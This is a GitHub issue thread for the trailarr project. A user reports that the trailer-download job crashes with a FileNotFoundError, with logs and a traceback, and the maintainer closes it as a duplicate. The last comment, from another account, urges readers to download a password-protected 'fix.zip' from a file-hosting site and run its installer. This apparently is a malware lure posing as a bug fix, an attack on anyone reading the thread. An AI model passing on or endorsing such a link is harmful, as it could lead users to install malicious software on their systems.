### ISSUE TITLE
[Bug] Issue with 30k movie library and countless "no such file or directory"

### ISSUE THREAD

**Issue by Glynax** [nandyalu/trailarr#32] opened 2024-08-28 05:03 UTC
**Describe the bug**
So I have about 16k downloaded movies in radarr, but 30k in the list. My first issue was I didn't have empty folders made for all of them so I ticked those boxes on in sonarr and radarr and now I'm playing whack a mole trying to figure out why it still can't find failing.
Really what this needs is separate tasks for sonarr and radarr so one could be working minimally, and to queue things up, one fails? Try the next. Don't just die immediately when anything fails.

**Steps To Reproduce**
Every time the download missing trailers task runs it fails in 2 seconds

**Actual behavior**
A clear and concise description of what is happening.

**Expected behavior**

**Screenshots**

**App Information (please complete the following information):**
 - Base OS: [e.g. Ubuntu]
- Architecture: (run `dpkg --print-architecture` to find out). [e.g. arm64, amd64]
 - Version [e.g. 22.04]
 - Browser (if related to webpage) [e.g. chrome 127.0.6533.89 (Official Build) (64-bit)]

**Additional context**
INFO:     127.0.0.1:35230 - "GET /status HTTP/1.1" 200 OK
INFO:     192.168.1.232:5796 - "GET /logs HTTP/1.1" 200 OK
INFO:     ('192.168.1.232', 5799) - "WebSocket /ws/804591" [accepted]
2024-08-28T00:56:52-0400 [INFO|main|L092]: Main: Client #804591 connected!
INFO:     connection open
INFO:     192.168.1.232:5796 - "GET /api/v1/logs/ HTTP/1.1" 200 OK
INFO:     192.168.1.232:5796 - "GET /api/v1/tasks/schedules HTTP/1.1" 200 OK
INFO:     192.168.1.232:5797 - "GET /api/v1/tasks/queue HTTP/1.1" 200 OK
INFO:     192.168.1.232:5797 - "GET /api/v1/tasks/run/download_missing_trailers_job HTTP/1.1" 200 OK
2024-08-28T00:57:00-0400 [INFO|base|L123]: Running job "Download Missing Trailers (trigger: interval[1:00:00], next run at: 2024-08-28 01:57:00 EDT)" (scheduled at 2024-08-28 00:57:00.910605-04:00)
2024-08-28T00:57:01-0400 [INFO|download_trailers|L088]: TrailerDownloadTasks: Downloading missing trailers
INFO:     192.168.1.232:5797 - "GET /api/v1/tasks/schedules HTTP/1.1" 200 OK
INFO:     192.168.1.232:5807 - "GET /api/v1/tasks/queue HTTP/1.1" 200 OK
2024-08-28T00:57:03-0400 [ERROR|base|L131]: Job "Download Missing Trailers (trigger: interval[1:00:00], next run at: 2024-08-28 01:57:00 EDT)" raised an exception
Traceback (most recent call last):
  File "/usr/local/lib/python3.12/site-packages/apscheduler/executors/base.py", line 125, in run_job
ERROR: Job "Download Missing Trailers (trigger: interval[1:00:00], next run at: 2024-08-28 01:57:00 EDT)" raised an exception
Traceback (most recent call last):
  File "/usr/local/lib/python3.12/site-packages/apscheduler/executors/base.py", line 125, in run_job
    retval = job.func(*job.args, **job.kwargs)
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/app/backend/core/tasks/download_trailers.py", line 89, in download_missing_trailers
    _download_missing_media_trailers(is_movie=True)
  File "/app/backend/core/tasks/download_trailers.py", line 43, in _download_missing_media_trailers
    if not FilesHandler.check_media_exists(db_media.folder_path):
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/app/backend/core/files_handler.py", line 151, in check_media_exists
    for entry in os.scandir(path):
                 ^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: "/mnt/mergerfs/data/media/movies/The Making of 'Dune Part One ()"
    retval = job.func(*job.args, **job.kwargs)
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/app/backend/core/tasks/download_trailers.py", line 89, in download_missing_trailers
    _download_missing_media_trailers(is_movie=True)
  File "/app/backend/core/tasks/download_trailers.py", line 43, in _download_missing_media_trailers
    if not FilesHandler.check_media_exists(db_media.folder_path):
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/app/backend/core/files_handler.py", line 151, in check_media_exists
    for entry in os.scandir(path):
                 ^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: "/mnt/mergerfs/data/media/movies/The Making of 'Dune Part One ()"
INFO:     192.168.1.232:5807 - "GET /api/v1/tasks/schedules HTTP/1.1" 200 OK
INFO:     192.168.1.232:5797 - "GET /api/v1/tasks/queue HTTP/1.1" 200 OK
INFO:     192.168.1.232:5797 - "GET /api/v1/logs/ HTTP/1.1" 200 OK
INFO:     127.0.0.1:38908 - "GET /status HTTP/1.1" 200 OK
INFO:     127.0.0.1:51444 - "GET /status HTTP/1.1" 200 OK

**Comment by nandyalu** [comment] 2024-08-28 05:10
Duplicate of #26. PR #30 will fix the issue

**Comment by Vomgnar** [comment] 2024-08-28 05:15
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Closed** 2024-08-29 17:16 UTC
Labels: bug, duplicate
